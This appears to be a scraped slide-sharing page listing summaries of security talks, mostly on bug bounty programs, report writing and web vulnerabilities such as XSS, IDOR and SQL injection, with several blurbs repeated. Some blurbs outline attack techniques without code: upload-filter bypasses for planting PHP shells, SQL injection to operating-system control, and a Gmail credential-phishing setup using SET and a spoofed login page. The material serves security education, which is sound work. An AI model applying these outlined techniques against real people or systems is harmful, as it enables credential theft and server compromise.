Writing Vuln Submissions that Maximize Your Payouts - presentation given at Nullcon 2016 by Bugcrowd's Kymberlee Price.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
The document discusses bug bounty hunting. It introduces Shubham Gupta and Yash Pandya who are security consultants and top bug hunters. It outlines the agenda which includes an introduction to bug bounty programs, reasons for bug hunting, how to find bugs, quick tips, proofs of concept, pros and cons, and a Q&A. It provides a brief history of bug bounty programs and notes that now anyone can participate from home. It discusses types of bugs and tools used for hunting. Quick tips include using Google dorks, testing for information disclosure vulnerabilities, and completing challenges to improve skills. Examples are provided of unique bugs found like SVG XSS and an IDOR issue found in Google.
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
The document summarizes the authors' experience hacking various Google services and bug bounty programs in order to find vulnerabilities. They were able to find and exploit stored cross-site scripting (XSS) vulnerabilities in Google Calendar, Analytics, FeedBurner, and Affiliate Network. They also used subdomain takeovers and permission bypasses to access restricted files on Picnik. The authors stressed thinking creatively and using "out-of-the-box" approaches to find vulnerabilities where others did not.
This document discusses bug bounty programs, which pay security researchers monetary rewards for reporting qualifying security bugs to companies. It explains that bug bounties are a cost-effective way for companies to improve security. The document provides tips for getting started in bug hunting, such as practicing skills, reading materials, and thinking logically. Popular bug bounty programs and platforms are also listed.
This document provides information for a bug bounty presentation. It introduces the speaker, Sagar Parmar, and his background in security. It then outlines topics to cover, including what a bug bounty is, how to get started as a new bug bounty hunter, tips for progressing, and example vulnerabilities to target like XSS, SQLi, SSRF, LFI, and RCE. Details are given on finding and reporting vulnerabilities with the goal of helping others learn and advance in bug bounty hunting.
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.
The document discusses bug bounty hunting. It introduces Shubham Gupta and Yash Pandya who are security consultants and top bug hunters. It outlines the agenda which includes an introduction to bug bounty programs, reasons for bug hunting, how to find bugs, quick tips, proofs of concept, pros and cons, and a Q&A. It provides a brief history of bug bounty programs and notes that now anyone can participate from home. It discusses types of bugs and tools used for hunting. Quick tips include using Google dorks, testing for information disclosure vulnerabilities, and completing challenges to improve skills. Examples are provided of unique bugs found like SVG XSS and an IDOR issue found in Google.
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
The document summarizes the authors' experience hacking various Google services and bug bounty programs in order to find vulnerabilities. They were able to find and exploit stored cross-site scripting (XSS) vulnerabilities in Google Calendar, Analytics, FeedBurner, and Affiliate Network. They also used subdomain takeovers and permission bypasses to access restricted files on Picnik. The authors stressed thinking creatively and using "out-of-the-box" approaches to find vulnerabilities where others did not.
This document discusses bug bounty programs, which pay security researchers monetary rewards for reporting qualifying security bugs to companies. It explains that bug bounties are a cost-effective way for companies to improve security. The document provides tips for getting started in bug hunting, such as practicing skills, reading materials, and thinking logically. Popular bug bounty programs and platforms are also listed.
This document provides information for a bug bounty presentation. It introduces the speaker, Sagar Parmar, and his background in security. It then outlines topics to cover, including what a bug bounty is, how to get started as a new bug bounty hunter, tips for progressing, and example vulnerabilities to target like XSS, SQLi, SSRF, LFI, and RCE. Details are given on finding and reporting vulnerabilities with the goal of helping others learn and advance in bug bounty hunting.
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.
This document discusses security bug bounty programs, which offer monetary rewards to researchers who discover qualifying security flaws in companies' systems. It outlines reasons for companies to implement such programs, like finding critical bugs faster and building relationships with the security community. Guidelines are provided on starting a bounty program, like starting small and gradually increasing budgets over time. Lessons from other large companies' bounty programs are shared, such as maintaining changing leaderboards to keep the field interesting.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
This document provides an introduction and overview of cross-site scripting (XSS) attacks. It discusses the impact of XSS, the different types (non-persistent, persistent, DOM-based), how XSS works by injecting client-side code through web requests, and includes demos. The document concludes with recommendations for preventing XSS, including validating and encoding input and output to avoid injecting malicious scripts.
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne
1. The document discusses how to write effective bug bounty reports by understanding what security teams look for in reports. It emphasizes providing detailed reproduction steps, analyzing exploitability and potential impact, and considering the perspective of the security team.
2. Common elements of an effective report include clear reproduction steps, analysis of how an attack could actually work in the real world, and understanding what types of vulnerabilities are important to the specific organization based on their industry and needs.
3. The presentation provides examples of good and bad reports, outlines typical service level agreements, and emphasizes asking questions to understand the priorities and scope of individual security programs.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The first security technology bug bounty predated the Internet by over one hundred years: Alfred C Hobbs breaking an unbreakable lock at the Great Exhibition of 1851 for the princely sum of 200 Guineas. With the acceleration of technology adoption, unintended consequences, our adversaries, and the need to quickly understand how "unhackable" things really are, it's safe to say that things have escalated since then.
In 2021, there as many who benefit from engaging the good-faith hacker community as there are folks who find themselves lost in a mish-mash of term confusion, unclear expectations, and general reservations - in spite of the increasingly obvious truth that "it takes an army of allies to overcome an army of adversaries". This breakout is for both.
Casey John Ellis, the Founder, Chairman, and CTO of Bugcrowd, pioneer of the crowdsourced security as-a-service category, and co-founder of The Disclose.io Project will unpack the "family tree" of vulnerability disclosure, bug bounty, and crowdsourced security testing, frame up how we got here, and facilitate a discussion from the group about where it all goes next.
Corncon 2021 - Inside the Unlikely RomanceCasey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
TechCrunch Early Stage 2020 - How to prioritize security at your startupCasey Ellis
Security is one of the most important things for a startup to focus on, but many struggle to dedicate time, resources, or budget to protect against something you never want to happen. How should startups prioritize security, and what do emerging companies need to know?
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMECasey Ellis
Just over 8 years ago bug bounty was a shiny security thing that crazy tech companies did sometimes, the concept of a digital locksmith hadn't been established in the consumer yet, and the Internet was generally a smaller and less politicized place. Casey Ellis decided it might be a good idea to "release the hounds" into the status quo, launching Bugcrowd and kicking off the crowdsourced security as a service market category, and it's safe to say that a fair bit has happened since. This keynote is for infosec practitioners and budding cybersecurity entrepreneurs, talking through what we've learned, what's changed, where I think it's all going next, and where we can position ourselves to continue making the Internet a more resilient place.
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...Casey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
OWASP Bangalore meet - Android Mobile SecurityAbhinav Sejpal
OWASP Bangalore meet - 28th March 2015 10:00 AM - 2:00 PM Mobile Application Security Testing Overview The Building blocks of Android Apps Live demos w.r.t Android App : Demo 1 - Poor Authorization and Authentication (M5) Demo 2 - Sensitive Information Leakage (M4) Demo 3 – Insecure Data storage (M2) Test factory Arsenal
The Game of Bug Bounty Hunting - Money, Drama, Action and FameAbhinav Mishra
The document provides an overview of the game of bug bounty hunting, including a brief history of bug bounty programs, the present state of platforms like HackerOne and BugCrowd, tips for getting started, techniques for finding different types of vulnerabilities, examples of famous bounty submissions, and potential drama one may face. It also includes suggestions for resources, tools, blogs, and people to follow to continue learning and developing skills in bug bounty hunting.
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
Website compromises can happen to any CMS and fixing them can be a daunting task.
Sucuri Remediation Team Lead, Ben Martin provided in this webinar a step by step guide to fixing your hacked Joomla! site.
This webinar is helpful if your website becomes compromised minimizing the attack time and stress.
Video here: https://youtu.be/3BEUQ0X9IBo
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
This document discusses approaches to testing open APIs using parameterized tests. It describes using data providers in TestNG and JUnit to pass parameters to tests from a data source. Examples are given in Java using TestNG data providers and JUnit's @Parameterized annotation. Similar approaches for Python and Scala are also listed. The document shows sample code using RestAssured to make requests to an API with different parameters. It discusses evolving the tests to run concurrently using multiple threads for improved performance.
Learn about the top hacking techniques of 2014, tips to stay away from hackers, and how Quick Heal can protect you against cybercriminals and other threats on the Internet.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
This document discusses security bug bounty programs, which offer monetary rewards to researchers who discover qualifying security flaws in companies' systems. It outlines reasons for companies to implement such programs, like finding critical bugs faster and building relationships with the security community. Guidelines are provided on starting a bounty program, like starting small and gradually increasing budgets over time. Lessons from other large companies' bounty programs are shared, such as maintaining changing leaderboards to keep the field interesting.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
This document provides an introduction and overview of cross-site scripting (XSS) attacks. It discusses the impact of XSS, the different types (non-persistent, persistent, DOM-based), how XSS works by injecting client-side code through web requests, and includes demos. The document concludes with recommendations for preventing XSS, including validating and encoding input and output to avoid injecting malicious scripts.
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...HackerOne
1. The document discusses how to write effective bug bounty reports by understanding what security teams look for in reports. It emphasizes providing detailed reproduction steps, analyzing exploitability and potential impact, and considering the perspective of the security team.
2. Common elements of an effective report include clear reproduction steps, analysis of how an attack could actually work in the real world, and understanding what types of vulnerabilities are important to the specific organization based on their industry and needs.
3. The presentation provides examples of good and bad reports, outlines typical service level agreements, and emphasizes asking questions to understand the priorities and scope of individual security programs.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The first security technology bug bounty predated the Internet by over one hundred years: Alfred C Hobbs breaking an unbreakable lock at the Great Exhibition of 1851 for the princely sum of 200 Guineas. With the acceleration of technology adoption, unintended consequences, our adversaries, and the need to quickly understand how "unhackable" things really are, it's safe to say that things have escalated since then.
In 2021, there as many who benefit from engaging the good-faith hacker community as there are folks who find themselves lost in a mish-mash of term confusion, unclear expectations, and general reservations - in spite of the increasingly obvious truth that "it takes an army of allies to overcome an army of adversaries". This breakout is for both.
Casey John Ellis, the Founder, Chairman, and CTO of Bugcrowd, pioneer of the crowdsourced security as-a-service category, and co-founder of The Disclose.io Project will unpack the "family tree" of vulnerability disclosure, bug bounty, and crowdsourced security testing, frame up how we got here, and facilitate a discussion from the group about where it all goes next.
Corncon 2021 - Inside the Unlikely RomanceCasey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
TechCrunch Early Stage 2020 - How to prioritize security at your startupCasey Ellis
Security is one of the most important things for a startup to focus on, but many struggle to dedicate time, resources, or budget to protect against something you never want to happen. How should startups prioritize security, and what do emerging companies need to know?
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMECasey Ellis
Just over 8 years ago bug bounty was a shiny security thing that crazy tech companies did sometimes, the concept of a digital locksmith hadn't been established in the consumer yet, and the Internet was generally a smaller and less politicized place. Casey Ellis decided it might be a good idea to "release the hounds" into the status quo, launching Bugcrowd and kicking off the crowdsourced security as a service market category, and it's safe to say that a fair bit has happened since. This keynote is for infosec practitioners and budding cybersecurity entrepreneurs, talking through what we've learned, what's changed, where I think it's all going next, and where we can position ourselves to continue making the Internet a more resilient place.
#AusCERT2021 - Inside The Unlikely Romance Crowdsourced Security from a Finan...Casey Ellis
It has been 20 years since Rainforest Puppy released the RFPolicy responsible disclosure policy, 11 years since Google and Facebook brought the concept of bug bounty into the eye of the security industry, and 9 years since Bugcrowd pioneered the concept of inserting a platform in the process to facilitate conversations between builders and breakers in order to level the skill and resourcing playing field against our adversaries.
So, how’s it all going? Did it all turn out to be a “tech company” thing? What have the results, and the impact on cybersecurity defense been on more traditionally conservative industries, like financial services? What can the history of the relationship between helpful hackers and organizations tell us about what we’ll need for the future?
In this talk, Casey Ellis (Founder, Chairman, and CTO of Bugcrowd) will unpack some salient lessons after nearly 10 years building Bugcrowd.
OWASP Bangalore meet - Android Mobile SecurityAbhinav Sejpal
OWASP Bangalore meet - 28th March 2015 10:00 AM - 2:00 PM Mobile Application Security Testing Overview The Building blocks of Android Apps Live demos w.r.t Android App : Demo 1 - Poor Authorization and Authentication (M5) Demo 2 - Sensitive Information Leakage (M4) Demo 3 – Insecure Data storage (M2) Test factory Arsenal
The Game of Bug Bounty Hunting - Money, Drama, Action and FameAbhinav Mishra
The document provides an overview of the game of bug bounty hunting, including a brief history of bug bounty programs, the present state of platforms like HackerOne and BugCrowd, tips for getting started, techniques for finding different types of vulnerabilities, examples of famous bounty submissions, and potential drama one may face. It also includes suggestions for resources, tools, blogs, and people to follow to continue learning and developing skills in bug bounty hunting.
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
Website compromises can happen to any CMS and fixing them can be a daunting task.
Sucuri Remediation Team Lead, Ben Martin provided in this webinar a step by step guide to fixing your hacked Joomla! site.
This webinar is helpful if your website becomes compromised minimizing the attack time and stress.
Video here: https://youtu.be/3BEUQ0X9IBo
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
This document discusses approaches to testing open APIs using parameterized tests. It describes using data providers in TestNG and JUnit to pass parameters to tests from a data source. Examples are given in Java using TestNG data providers and JUnit's @Parameterized annotation. Similar approaches for Python and Scala are also listed. The document shows sample code using RestAssured to make requests to an API with different parameters. It discusses evolving the tests to run concurrently using multiple threads for improved performance.
Learn about the top hacking techniques of 2014, tips to stay away from hackers, and how Quick Heal can protect you against cybercriminals and other threats on the Internet.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
How to do well in Bug bounty programs. Presentation at @nullhyd by AbhijethAbhijeth D
This is a presentation which talks about how to do well in Bug bounty programs. The slides explain few best practices suggested by top best bug hunters around the world.
For further details about the presentation/suggestions feel free to contact @abhijeth.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
This document discusses cross-origin attacks using polyglot files that can be interpreted in multiple formats. Specifically, it examines:
1) Syntax injection attacks where fragments of PDF syntax are injected into HTML pages hosted on vulnerable sites, allowing extraction of sensitive data from the original domain.
2) Content smuggling attacks where an attacker uploads a polyglot file in a benign format (e.g. PDF) that also contains malicious content to a vulnerable site, then embeds it to exploit visitors through content reinterpretation.
3) The potential for these attacks using PDF, which has powerful interactive capabilities, error-tolerant parsing, and ability to issue cross-origin requests like CSRF with cookies
Lightning talk I gave at SEC-T spring pub 2016, talking about how to use the "ON DUPLICATE KEY UPDATE" syntax to not only extract but also modify/add information in the database.
The example I brought up was a site that had an SQL Injection in the register page, which could be used to change the admin password without having to crack it.
If You Can't Beat 'Em, Join 'Em (AppSecUSA)bugcrowd
Grant McCracken and Daniel Trauner's presentation on setting up and managing a successful bug bounty program. Having a bug bounty program is one of the most efficient methods of finding security vulnerabilities today. But, as anyone who has tried to run a bug bounty program knows, it's not a trivial undertaking... As professionals who have helped to manage hundreds of bug bounty programs, we're uniquely positioned to provide advice on how to succeed. Whether you're already running a bug bounty program, are looking to run a bug bounty program, or are a researcher, this talk aims to deepen your knowledge of the subject.
Presented at OWASP AppSecUSA 2011
It's all about scale; how can an organization possibly keep up with a growing number of web applications, features, and supported capabilities with a limited security team? One option that has provided successful results for several companies is a bug bounty program. These programs successfully engage the world community and bring many eyes towards the common good.
This talk will discuss the benefits and risks of a bounty program for web applications. What types of organizations consider starting a bounty? How would an organization start such a program and what should they expect? Is the return worth the effort? How does such a program compete with the black market?
In addition to these topics, we will also discuss the progress, metrics and lessons learned from the Mozilla web application bounty that was launched in December 2010.
BSides Lisbon 2013 - All your sites belong to BurpTiago Mendo
This talk is going to be all about Burp. I will explain why is such a great tool and how it compares with similar ones.
Its going to have a quick walkthrough of its main features, but the juicy part is going to be about how to fully explore its main tools, such as the scanner, intruder and sequencer, to increase the number and type of vulnerabilities found.
In addition, I will provide an overview of the Burp Extender Interface and how to easily and quickly take advantage of extensions to increase its awesomeness. I will show how easy is for an pentester to translate an idea to a extension and (I hope) publicly release one plugin to further help pentesters.
The talks objective is to increase your efficiency while using Burp, either by taking advantage of its excellent tools or by adding that feature that really need.
Presented at BSides Lisbon at 04/10/13 (http://bsideslisbon.org)
Getting the Most out of Burp Extensions. How to build a Burp extension, techniques for passive and active scanners, defining insertion points, modifying requests, and building GUI tools. This talk presents code libraries to make it easy for testers to rapidly customize Burp Suite.
Web-App Remote Code Execution Via Scripting Engines by Rahul Sasi at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
This document provides an agenda for a presentation on web application pentesting and using Burp Suite. The presentation will include an overview of Burp Suite, how to get started with it, automated and manual testing techniques, and tips for web hacking. It will cover features of Burp like the proxy, spider, scanner, intruder, repeater, sequencer, and extender. The goal is to help attendees learn the foundation of using Burp Suite for web assessments.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
Burp Suite is a free and professional Java-based tool for testing web application security. It includes several integrated tools like Proxy, Spider, Scanner, Intruder, Repeater, and Sequencer. The Proxy is used to intercept, modify, and replay HTTP/S requests. The Spider crawls the web application to discover hidden resources. The Scanner automatically scans for vulnerabilities. Intruder allows for customized attacks through fuzzing. Repeater replays requests for manual testing. And Sequencer analyzes randomness of tokens. It has both free and commercial editions, and supports Windows, Mac, and Linux.
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
The document describes how to steal Gmail credentials using social engineering and the Social Engineering Toolkit (SET). It involves tricking a victim into entering their login credentials on a spoofed Gmail login page hosted on the attacker's machine. The attacker first sets up Kali Linux in a virtual machine and launches SET. They then change the victim's Gmail bookmark to point to the attacker's IP address hosting the fake login page. When the victim tries to access Gmail, they enter their credentials which are stolen by SET. The document warns readers to be vigilant against these kind of social engineering attacks.
This document discusses hackers and software security. It provides examples of past hacks such as those on Sony Pictures and Citigroup. It outlines why software security is important when handling sensitive user information. The document discusses how hackers think and different types of hackers. It recommends following security principles like defense in depth, least privilege, and keeping security simple. It provides references for further reading on application security topics.
Devnexus 2017 Cybercrime and the Developer: How do you make a difference?Steve Poole
Cybercrime how bad can it be? Organised attacks around the world in 2016 have shown how unprepared we are to deal with the growth of Cybercrime. In this talk learn a little about the scale of the challenge developers face from assaults on our systems. Be prepared to be appalled and scared. Fainting is not allowed. Discover how to fight back and see how you can change your behaviour and your code to defend against these attacks.
Your destiny is clear - it’s time to be come a Cyber Defender
While phishing is an “old-fashioned” cyber security threat, attacks continue to increase. This course will better prepare you to defend against this threat.
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
This presentation contains Introduction of Phishing attack, its types and Various techniques, their impact with real live example, after that its Avoidance, Prevention and Solution. Also it contains brief introduction of SSL and HTTPS with their working.
Jax london2016 cybercrime-and-the-developerSteve Poole
In the emerging world of DevOps and the Cloud, most developers are trying to learn new technologies and methodologies. The focus tends to be on adding capabilities such as resiliency and scaling to an application. Still, one critical item consistently overlooked is security.
The world of the Cyber Criminal is closer than you realize. Watch a real man-in-the-middle demonstration and learn just how simple it can be for others to steal your secrets. In this talk you’ll learn about other practical examples of how you can inadvertently leave the doors open and what you can do to keep your system secure. In the end, security is everyone’s concern and this talk will teach you a few of simple actions you can take (and some behaviours you must change) to create a more secure application in the Cloud.
Phishing Attacks - Are You Ready to Respond?Splunk
Phishing and Spear Phishing attacks are the number one starting point for most large data breaches. But there is currently no efficient prevention technology available to mitigate this risk. Learn what capabilities organizations need to have in order to respond to phishing attacks and lower the risk.
- Learn how to detect and respond to phishing attacks
- Understand how an average user behaves when faced with a phishing attack and why they are so successful
- Get insight into the questions that you will need to answer if a phishing campaign is running against your organisation
- Learn the capabilities organisations will need to have in order to answer those questions and protect against phishing attacks
- Learn how you improve your incident response capabilities
If you received an email from Instagram letting you know that your email address was changed, you may be able to undo this by using the revert this change option in that message. If additional information was also changed (example: your password), and you're unable to change your email address, please report the account to Instagram.
Under section 43, a simple civil offense where a person without permission of the owner accesses the computer and extracts any data or damages the data contained therein will come under civil liability. The hacker shall be liable to pay a fine to the affected party. Under the Information Technology Act, 2000, the maximum cap for compensation was fine at Rs. 1 crore. However in the amendment made in 2008, this ceiling was removed.
Dealing with the threat of spoof and phishing mail attacks part 6#9 | Eyal ...Eyal Doron
In the following article, we will review the solution and the methods that we can use for dealing with the threat of – Phishing mail attacks and his derivative Spoof mail attack.
2022 Rea & Associates' Cybersecurity Conference Rea & Associates
The speaker discusses changes to the Cybersecurity Maturity Model Certification (CMMC) program over the past year, including changes to the CMMC model, rules, and the organization administering the program. Voluntary assessments are now taking place and the CMMC ecosystem of assessors, trainers, and consultants is developing. Remaining challenges include high costs of compliance, legal consequences, reciprocity between government agencies, and issues with cloud computing. The speaker stresses the importance of ethics and offers that help is available for organizations navigating CMMC requirements.
The document provides instructions for writing an essay using the website HelpWriting.net. It outlines a 5-step process: 1) Create an account with a password and email; 2) Complete a 10-minute order form with instructions, sources, and deadline; 3) Review bids from writers and choose one; 4) Review the completed paper and authorize payment; 5) Request revisions to ensure satisfaction. The website promises original, high-quality content and refunds for plagiarized work.
Social Media's Dark Side: Risks, Reasons & RemediesRichard M
This document summarizes the risks of social media and provides remedies. It discusses how social media has increased risks from competitors, employees, and careless practices. Specific risks mentioned include brand association, executive indiscretion, employee messaging, activists, phishing and hacking, and impersonation. Remedies proposed include social media monitoring strategies, rules of engagement for responding to issues, and action strategies like responding to threats, removing threats, and burying threats through positive coverage. It emphasizes the importance of having a social media crisis team and continually monitoring to protect brands across sites.
This document summarizes a student project analyzing phishing attacks on the Facebook social media platform. The study involved:
